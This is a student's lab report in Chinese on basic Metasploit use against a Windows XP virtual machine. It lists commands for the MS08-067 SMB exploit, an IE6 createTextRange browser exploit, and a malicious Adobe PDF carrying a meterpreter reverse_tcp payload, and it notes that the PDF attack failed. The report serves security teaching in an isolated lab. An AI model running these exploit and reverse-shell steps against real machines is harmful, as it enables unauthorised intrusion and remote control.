20201302姬正坤 《网络对抗技术》Exp6 MSF基础应用

发布时间 2023-05-05 00:50:03作者: ~纯净~

《网络对抗技术》Exp6 MSF基础应用

实践内容

一、一个主动攻击实践

Windows Xp的IP:192.168.241.137

image

kali的ip:192.168.241.132

image

互相能ping通

image
image

使用ms08_067漏洞

攻击者试探靶机是否存在此漏洞 nmap -sS -A --script=smb-vuln-ms08-067 -PO

image

有以下信息

image

启动msfconsole,然后输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi

image

输入指令 use exploit/windows/smb/ms08_067_netapi 进入攻击模块,输入info exploit/windows/smb/ms08_067_netapi查看模块具体的信息

image

进行攻击

image
image

二、一个针对浏览器的攻击

ms06_013_createtextrange漏洞

image
image

在XP的IE浏览器打开生成的地址,刘览器开始从0-100计时

image

三、一个针对客户端的攻击

Adobe

启动msfconsole,然后输入search adobe查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton,如下图所示:

image

使用use exploit/windows/fileformat/adobe_toolbutton设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数

image

复制生成的pdf文件到共享文件夹供xp虚拟机上钩

image
image

在linux中另外打开一个终端,msfconsole进入控制台,开启监听模式
在xp虚拟机中打开pdf查看kali捕捉结果

image

这里实验没有成功,遇到不知道的问题没有得到结果

四、成功应用任何一个辅助模块

端口扫描:auxiliary/scanner/portscan

image

实验总结

实验问题回答

用自己的话解释什么是exploit,payload,encode

  • exploit就是通过漏洞将自己的恶意代码植入目标主机从而达到攻击的目的
  • payload是载荷,里面包含了攻击者想要执行的代码
  • encode可以对恶意代码进行伪装,使其不被目标主机发现,从而达到攻击的目的

实践体会

本次实验带给我的感受就是msf的功能很丰富,还有很多需要慢慢学习的地方,实验中最难过的时候,就在你做了那么多操作,就差最后一步的时候,它却没有攻击成功。